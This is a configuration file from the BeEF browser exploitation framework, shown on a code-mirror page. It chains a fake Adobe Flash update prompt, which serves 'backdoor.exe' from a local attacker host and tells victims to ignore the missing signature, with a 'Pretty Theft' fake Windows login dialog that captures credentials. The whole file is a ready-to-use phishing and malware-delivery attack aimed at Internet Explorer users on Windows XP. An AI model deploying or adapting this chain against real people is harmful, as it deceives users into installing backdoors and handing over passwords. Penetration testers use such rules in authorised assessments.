Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/arerules/ie_win_missingflash-prettytheft.json
1146 views
1
{
2
"name": "Fake missing plugin + Pretty Theft LinkedIn",
3
"author": "antisnatchor",
4
"browser": "IE",
5
"browser_version": ">= 8",
6
"os": "Windows",
7
"os_version": "== XP",
8
"modules": [{
9
"name": "fake_notification_c",
10
"condition": null,
11
"options": {
12
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
13
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
14
}
15
}, {
16
"name": "pretty_theft",
17
"condition": null,
18
"options": {
19
"choice": "Windows",
20
"backing": "Grey",
21
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
22
}
23
}],
24
"execution_order": [0, 1],
25
"execution_delay": [0, 5000],
26
"chain_mode": "sequential"
27
}
28